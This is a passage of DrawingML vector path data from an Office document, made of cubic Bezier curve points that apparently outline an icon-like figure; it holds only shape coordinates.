                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="209"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="199"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="71" y="200"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="197"/>
                      <a:pt x="4" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="8" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="183"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="146"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="98"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="159" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="158"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="153"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="150"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="84" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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5"/>
                      <a:pt x="86" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="71"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="118"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="131"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="141"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="147"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="158"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="198"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="185"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="186"/>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9"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="120"/>
                      <a:pt x="135" y="98"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="111"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="71"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="63"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="55"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="44"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="37"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="38"/>
                      <a:pt x="100" y="39"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="106" y="51"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="45"/>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1"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="67" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="38"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="67"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="44"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
